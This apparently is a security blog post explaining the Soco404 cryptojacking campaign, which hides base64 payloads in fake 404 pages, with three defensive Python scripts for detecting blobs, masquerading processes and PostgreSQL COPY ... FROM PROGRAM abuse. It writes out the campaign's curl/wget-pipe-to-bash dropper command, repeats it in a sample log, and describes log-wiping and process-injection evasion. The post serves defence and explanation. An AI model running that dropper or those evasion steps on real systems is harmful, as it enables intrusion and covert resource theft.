What is Soco404 malware and how are fake 404 error pages being used to attack Linux and Windows systems?

Soco404 is a cyber threat campaign that delivers platform-specific malware through fake 404 error pages. The technique embeds base64-encoded payloads inside error screens hosted on Google Sites and on compromised web servers. When the loader already running on a compromised host fetches one of these pages, it decodes the payload and executes it directly in memory, bypassing file-based security controls. The campaign targets both Linux and Windows using customized loaders (soco.sh for Linux and ok.exe for Windows), which mimic legitimate processes to avoid detection. Researchers at Wiz found that it gains its foothold through exposed PostgreSQL instances (via COPY ... FROM PROGRAM) and other misconfigured servers, and uses HTML smuggling to deploy crypto-mining malware stealthily.



A new and dangerous cyber threat is making its way into Linux and Windows systems — and it comes disguised as something innocent: a 404 error page. This blog explains everything you need to know about Soco404, the malware campaign that hides crypto-miners inside fake error pages.

Let’s break it down in a simple, clear, and structured format so both professionals and beginners can understand and stay protected.

What Is the Soco404 Malware Campaign?

Soco404 is a cyber attack campaign that hides malware inside fake 404 error pages. These error pages are hosted on Google Sites or on compromised web servers, and carry the malicious code as a Base64 blob wedged between ordinary HTML tags.

Nobody has to click anything: a small loader, dropped on a server the attackers have already broken into, fetches the page, pulls out the blob, decodes it, and runs the result on the victim machine, whether it is running Linux or Windows.

Why Is Soco404 So Dangerous?

  • Cross-platform: Works on both Linux and Windows.

  • Stealthy delivery: A 404 response is rarely treated as a download, so proxies and content filters tend to wave it through.

  • Disguised payloads: The malware is base64-encoded and hidden between normal HTML tags.

  • Difficult to detect: The decoded payload runs from memory, so antivirus and disk scanning see little on disk.

  • Resource hijacking: It silently runs cryptominers, increasing power bills and degrading performance.

How Does Soco404 Infect Systems?

Here’s the step-by-step attack flow of the Soco404 malware campaign:

  • The loader fetches the fake error page (e.g. https://fastsoco.top/1). Purpose: entry point of the infection.

  • The Base64 blob is extracted from the HTML and decoded. Purpose: activate the hidden payload.

  • The payload is executed directly in memory. Purpose: avoid writing to disk.

  • The miner installs and renames itself. Purpose: stay hidden as a system process.

  • Watchdog threads respawn it if it is killed. Purpose: ensure persistence.
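To make the "hidden between normal HTML tags" step concrete, here is an added example of mine, not code from the Wiz research or from the Soco404 loader, that scans a page body for long base64 runs and reports the ones that decode to a script or executable. The sample page, the stand-in script and the data-URI image are constructed for the demo. The real loader looks for its own marker rather than for any long run, so a defensive scanner has to judge blobs by what they decode to, which is what this one does.

```python
"""Scan an HTML body (e.g. a suspicious 404 response) for base64 blobs that
decode to something executable. Added example; not from the Wiz report or
the Soco404 code."""
import base64
import binascii
import re

# Any base64 run of at least 40 characters; shorter runs are usually tokens
# or hashes and would only produce noise.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Strings that make a decoded blob look like a downloader/dropper script.
SHELL_HINTS = (b"/bin/sh", b"/bin/bash", b"curl ", b"wget ", b"base64 -d",
               b"chmod +x", b"nohup ", b"certutil", b"Invoke-WebRequest",
               b"powershell")


def classify(blob: bytes):
    """Return a label for an executable-looking decoded blob, else None."""
    if blob.startswith(b"MZ"):
        return "pe-executable"
    if blob.startswith(b"\x7fELF"):
        return "elf-executable"
    if blob.startswith(b"#!"):
        return "script"
    if any(hint in blob for hint in SHELL_HINTS):
        return "shell-like-text"
    return None  # e.g. a data: URI image decodes to PNG/JPEG bytes


def scan_page(html: str):
    """Return one finding per base64 run that decodes to executable content."""
    findings = []
    for match in B64_RUN.finditer(html):
        run = match.group(0)
        try:
            decoded = base64.b64decode(run, validate=True)
        except binascii.Error:
            continue  # not valid base64 (bad padding or alphabet)
        label = classify(decoded)
        if label:
            findings.append({
                "offset": match.start(),
                "length": len(run),
                "kind": label,
                "preview": decoded[:60],
            })
    return findings


# ---- constructed sample input (a stand-in, not the real Soco404 page) ----
_stand_in_script = (b"#!/bin/sh\n"
                    b"# harmless stand-in payload for the example\n"
                    b"echo hello\n")
_stand_in_image = b"\x89PNG\r\n\x1a\n" + b"\x00" * 40  # looks like a PNG

SAMPLE_404 = f"""<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found</h1>
<p>The requested URL was not found on this server.</p>
<img src="data:image/png;base64,{base64.b64encode(_stand_in_image).decode()}">
<div id="x" style="display:none">{base64.b64encode(_stand_in_script).decode()}</div>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_404):
        print(finding["kind"], "at offset", finding["offset"], finding["preview"])
```

The image blob is deliberately included to show the false-positive case: it is a perfectly valid base64 run, but it decodes to a PNG header and is left alone, while the hidden script is reported.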

Linux Infection Details

On Linux systems, the malware is dropped via a command like:

sh -c "(curl http://:8080/soco.sh || wget -q -O- http://:8080/soco.sh) | bash"

The downloaded soco.sh script then:

  • Generates a random filename for the dropped binary

  • Clears the login history in /var/log/wtmp

  • Kills competing miners so it has the CPU to itself

  • Uses a Go-based stub to rename itself after a kernel thread (e.g. cpuhp/1)

  • Launches an XMRig miner with hardcoded Monero wallets

Windows Infection Path

On Windows, the process includes:

  • Dropping ok.exe using certutil, curl, or Invoke-WebRequest

  • Running it as a hidden process that masquerades as conhost.exe

  • Injecting the mining code into that process

  • Deleting the original executable once the miner is running

  • Disabling Windows Event Logs to cover its tracks

How Attackers Are Spreading It

Attackers are using:

  • Compromised Tomcat servers

  • Insecure PostgreSQL databases

  • Misconfigured Atlassian Confluence servers

  • Publicly exposed web applications

In some cases, compromised Korean transportation websites have been used to serve these fake 404 pages to end users.

How Does the Malware Stay Hidden?

  • Disguises as:

    • sd-pam

    • kworker/R-rcu_p

    • Random 8-character Windows services

  • Disables logs

  • Uses cron jobs (Linux) and startup registry keys (Windows)

  • Communicates over local sockets instead of external domains

  • Keeps watchdog threads alive to restart if stopped
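A practical check for the masquerading described above, as an added example that is neither Wiz's tooling nor the Soco404 code: genuine kernel threads such as kworker/R-rcu_p and cpuhp/1 are children of kthreadd (PID 2) and have no /proc/PID/exe target, and the real sd-pam is a fork of the user's systemd instance, so a process that wears one of those names but has a userland parent, a backing binary, or a deleted executable deserves a look. The process snapshot in SAMPLE_PROCS is constructed for the demo; the heuristics are standard /proc semantics.

```python
"""Flag processes whose names imitate kernel threads or systemd helpers.
Added example (not Wiz's tooling or the Soco404 code)."""
import os
import re
from dataclasses import dataclass
from typing import Optional

# Names Soco404 borrows, plus common kernel-thread prefixes. Real kernel
# threads hang off kthreadd (PID 2) and have no /proc/PID/exe target.
KERNEL_THREAD_NAME = re.compile(
    r"^(kworker/|cpuhp/|rcu_|ksoftirqd/|migration/|kswapd|kthreadd$)")
# The genuine sd-pam is a fork of the user's systemd instance.
SYSTEMD_EXES = ("/usr/lib/systemd/systemd", "/lib/systemd/systemd")


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str
    exe: Optional[str]  # readlink(/proc/PID/exe); None for kernel threads


def collect_procs():
    """Read live processes from /proc (run as root so exe links resolve)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/stat") as fh:
                stat = fh.read()
            # comm is parenthesised and may itself contain spaces or parens
            comm = stat[stat.index("(") + 1:stat.rindex(")")]
            ppid = int(stat[stat.rindex(")") + 2:].split()[1])
        except (OSError, ValueError):
            continue  # process exited while we were reading it
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = None  # kernel thread, or not ours to read
        procs.append(Proc(pid, ppid, comm, exe))
    return procs


def find_masquerades(procs):
    """Return {pid: [reasons]} for processes whose name does not fit their origin."""
    suspicious = {}

    def flag(p, why):
        suspicious.setdefault(p.pid, []).append(why)

    for p in procs:
        if KERNEL_THREAD_NAME.match(p.comm):
            if p.ppid not in (0, 2):
                flag(p, f"kernel-thread name but parent is PID {p.ppid}, not kthreadd")
            if p.exe is not None:
                flag(p, f"kernel-thread name but backed by userland binary {p.exe}")
        if p.comm == "sd-pam" and not (p.exe or "").startswith(SYSTEMD_EXES):
            flag(p, f"sd-pam not running from systemd's binary (exe={p.exe})")
        if p.exe and p.exe.endswith(" (deleted)"):
            flag(p, "executable was deleted after launch")
    return suspicious


# Constructed process snapshot for a stand-alone demo (not real telemetry).
SAMPLE_PROCS = [
    Proc(1, 0, "systemd", "/usr/lib/systemd/systemd"),
    Proc(2, 0, "kthreadd", None),
    Proc(15, 2, "kworker/R-rcu_p", None),                    # genuine kernel thread
    Proc(1199, 1, "systemd", "/usr/lib/systemd/systemd"),    # systemd --user
    Proc(1200, 1199, "sd-pam", "/usr/lib/systemd/systemd"),  # genuine sd-pam
    Proc(3000, 1, "nginx", "/usr/sbin/nginx"),
    Proc(4321, 1, "kworker/R-rcu_p", "/tmp/.x/kworker (deleted)"),  # masquerade
    Proc(5555, 1, "sd-pam", "/var/tmp/sd-pam"),              # masquerade
]

if __name__ == "__main__":
    live = collect_procs() if os.path.isdir("/proc") else SAMPLE_PROCS
    for pid, reasons in sorted(find_masquerades(live).items()):
        print(pid, *reasons, sep="\n    ")
```

On a host where the exe link cannot be read for other users' processes the second rule goes quiet, so run the check as root; the parent-PID rule still works without privileges.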

Impact on Systems

Many organizations don’t notice the breach because:

  • No alerts are triggered

  • Antivirus tools miss memory-based payloads

  • The only visible signs are often:

    • High CPU usage

    • Increased electricity bills

    • Slow system performance

Real-World Discovery: Who Found It?

The campaign was uncovered by Wiz.io researchers, who noticed strange shell activity coming from public PostgreSQL databases — a service that many cloud users leave unintentionally open.

How to Protect Your System from Soco404

Here are essential tips to stay safe from malware hidden in error pages:

Best Practices:

  • Treat a server that fetches 404 pages from unfamiliar hosts as suspicious; the loader, not a person, requests these pages, so a database or web server pulling one down is a red flag

  • Block access to known-bad domains such as fastsoco.top

  • Monitor for unexpected CPU usage or performance drops

  • Regularly check and patch:

    • Tomcat servers

    • PostgreSQL

    • Confluence

  • Implement behavior-based endpoint detection

Technical Defenses:

  • Lock down COPY ... FROM PROGRAM in PostgreSQL. It cannot be switched off, but it only works for superusers and members of the pg_execute_server_program role, so give application accounts neither, use strong passwords, and keep port 5432 off the internet

  • Use AppArmor or SELinux to confine the postgres process so it cannot spawn shells or fetch remote content

  • Set up network-based anomaly detection; a database server that suddenly fetches a 404 page or talks to a mining pool should stand out
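Because COPY ... FROM PROGRAM cannot be switched off, logging and reviewing its use is the realistic control. The following added example, not from the Wiz report, scans PostgreSQL log lines for COPY ... FROM/TO PROGRAM statements and rates any program string that looks like a download-and-execute chain as high. It assumes log_statement = 'all' and log_line_prefix = '%m [%p] %u@%d '; the log lines, the etl role and the 203.0.113.10 download host are constructed for the demo.

```python
"""Flag COPY ... FROM/TO PROGRAM statements in PostgreSQL logs.
Added example; not from the Wiz report. Assumes log_statement = 'all'
and log_line_prefix = '%m [%p] %u@%d '."""
import re

# Timestamp (%m), backend PID, user@database, then the logged statement.
LINE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$")
# The program string is a single-quoted SQL literal (quotes doubled inside).
COPY_PROGRAM = re.compile(
    r"\bCOPY\b.*?\b(?:FROM|TO)\s+PROGRAM\s+'(?P<cmd>(?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL)
# Fetch-and-run idioms seen in cryptojacking droppers.
DOWNLOAD_AND_RUN = re.compile(
    r"(curl|wget|/dev/tcp|base64\s+-d|\|\s*(ba)?sh\b|certutil|powershell|Invoke-WebRequest)",
    re.IGNORECASE)


def find_copy_program(log_lines, trusted_users=frozenset()):
    """Return one finding per COPY ... PROGRAM statement.

    trusted_users are roles expected to use PROGRAM (an ETL account, say);
    their statements are still reported but rated 'review' instead of
    'medium'. Anything that fetches and runs remote content is 'high'
    regardless of who issued it."""
    findings = []
    for line in log_lines:
        m = LINE.match(line.rstrip("\n"))
        if not m:
            continue
        c = COPY_PROGRAM.search(m["sql"])
        if not c:
            continue  # plain COPY FROM a file, or not a COPY at all
        cmd = c["cmd"].replace("''", "'")  # undo SQL quote doubling
        if DOWNLOAD_AND_RUN.search(cmd):
            severity = "high"
        elif m["user"] in trusted_users:
            severity = "review"
        else:
            severity = "medium"
        findings.append({"ts": m["ts"], "pid": int(m["pid"]), "user": m["user"],
                         "db": m["db"], "cmd": cmd, "severity": severity})
    return findings


# Constructed log excerpt (placeholder host, not real telemetry).
SAMPLE_LOG = """
2025-07-21 09:14:02.118 UTC [2175] postgres@postgres LOG:  statement: CREATE TABLE IF NOT EXISTS cmd_exec(cmd_output text)
2025-07-21 09:14:02.231 UTC [2175] postgres@postgres LOG:  statement: COPY cmd_exec FROM PROGRAM 'sh -c "(curl http://203.0.113.10:8080/soco.sh || wget -q -O- http://203.0.113.10:8080/soco.sh) | bash"'
2025-07-21 09:14:05.002 UTC [2190] app@inventory LOG:  statement: COPY products FROM '/var/lib/postgresql/import/products.csv' WITH (FORMAT csv)
2025-07-21 09:15:11.440 UTC [2175] postgres@postgres LOG:  statement: DROP TABLE cmd_exec
2025-07-21 09:16:00.000 UTC [2201] etl@inventory LOG:  statement: COPY sales FROM PROGRAM 'gunzip -c /var/lib/postgresql/import/sales.csv.gz'
""".strip().splitlines()

if __name__ == "__main__":
    for f in find_copy_program(SAMPLE_LOG, trusted_users={"etl"}):
        print(f["severity"].upper(), f["ts"], f"{f['user']}@{f['db']}", f["cmd"])
```

Pair this with a one-off role audit: any role with rolsuper set, or that is a member of pg_execute_server_program, can run shell commands as the postgres OS user, and in a well-configured instance that list is the DBA account alone.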

Conclusion

The Soco404 malware campaign is a strong reminder that even the most harmless-looking elements like a 404 error page can be weaponized. By hiding payloads in HTML and running in memory, attackers are staying ahead of traditional defenses.

Whether you're a cybersecurity analyst, a system admin, or just an alert user — understanding this attack can help you take the right action before your resources are stolen in silence.

FAQs

What is the Soco404 malware campaign?

Soco404 is a cryptojacking campaign that hides malware in fake 404 error pages to infect Linux and Windows systems with platform-specific miners.

How does Soco404 bypass traditional malware scanners?

It embeds the payload in base64 between HTML tags, decoding directly in memory and avoiding disk-based detection tools.

Which platforms are affected by Soco404?

Both Linux and Windows systems are targeted with customized malware loaders.

What is the role of PostgreSQL in this malware attack?

The attackers log in to exposed, poorly secured PostgreSQL databases with a privileged account and use COPY ... FROM PROGRAM, which runs an operating-system command as the database server's user, to execute their download-and-run one-liner.

What is HTML smuggling in the context of Soco404?

It refers to the tactic of hiding malicious code within a webpage’s structure so it can be executed after being decoded on the client side.

How is the malware delivered?

Through fake 404 pages hosted on compromised servers and Google Sites. The payload is loaded using curl, wget, certutil, or PowerShell.

What is the purpose of soco.sh and ok.exe?

These are the Linux and Windows payloads respectively. They install miners, delete evidence, and ensure persistence.

How do Linux systems get infected?

A one-liner shell command downloads and executes the soco.sh script, which drops a randomly named binary, clears login history, kills competing miners and starts XMRig under a kernel-thread-style name.

How do Windows systems get infected?

Files like ok.exe are downloaded to the public folder, executed, injected into conhost.exe, and then removed to avoid detection.

What indicators might hint at Soco404 infection?

Unexpected CPU usage, increased power bills, sluggish performance, and unusual process names like cpuhp/1 or fake Windows services.

What are the mining pools involved?

The malware connects to c3pool and moneroocean mining pools using hardcoded wallets.

What is the attack flow of Soco404?

Loader → fake 404 error page → decode base64 blob → execute payload in memory → install miner → ensure persistence.

Why is Soco404 difficult to detect?

It avoids writing to disk and uses process masquerading, watchdog threads, and memory injection.

What are some Linux process names used by the malware?

sd-pam, kworker/R-rcu_p, and cpuhp/1.

What methods does it use to maintain persistence?

Cron jobs, shell hooks, Windows registry changes, and watchdog threads that respawn malware processes.

Can traditional firewalls stop Soco404?

Not always. It uses legitimate ports and local socket communication, making it stealthier.

How can organizations prevent this malware?

Secure PostgreSQL databases, disable risky features like COPY FROM PROGRAM, and use advanced threat detection tools.

How are compromised websites used in this campaign?

Websites are turned into trusted-looking hosts for fake 404 pages that smuggle malware.

Is this campaign related to past Tomcat or Atlassian exploits?

Yes, it appears to be an evolved form of earlier botnets that targeted weak Tomcat credentials and unpatched Atlassian instances.

What should system admins look out for?

Base64 blobs in web traffic, unknown scheduled tasks, and unexpected services or processes.

Does Soco404 affect mobile devices?

No known mobile infections have been reported so far.

What scripting languages are used in the malware?

Shell scripting and Go are used for payload delivery and miner execution.

Why are fake 404 pages effective for malware delivery?

They appear harmless and evade security filters looking for suspicious URLs or file downloads.

Is the malware fileless?

Largely. The payload is decoded and run from memory and the dropped executables are deleted after launch, but the loaders do touch disk briefly (a randomly named file on Linux, ok.exe in the public folder on Windows), so file-creation telemetry can still catch it.

What’s the financial motive behind this attack?

To mine cryptocurrency covertly using infected systems’ resources.

How can users identify a fake error page?

Usually not by looking at it; a person is not the one fetching these pages anyway. They are identified through traffic analysis, for example by flagging 404 response bodies that contain long Base64 runs, and through the behaviour of the process that requested them.

Which file or URL is key to the attack?

https://www.fastsoco.top/1 is one such 404 page used in this malware chain.

Are there any forensic challenges in Soco404?

Yes. The malware erases logs, deletes itself, and mimics real processes, making forensics difficult.

What regions are affected by Soco404?

The campaign includes compromised Korean websites and global targets, especially those with misconfigured cloud setups.

Can XMRig be linked to the attack?

Yes, the malware uses XMRig for Monero mining after infection.

What are watchdog threads in this context?

Background processes that restart the malware if killed by antivirus or manual intervention.

How does the malware spread laterally?

Via misconfigured databases and server access, allowing the attacker to deploy it across multiple OS environments.
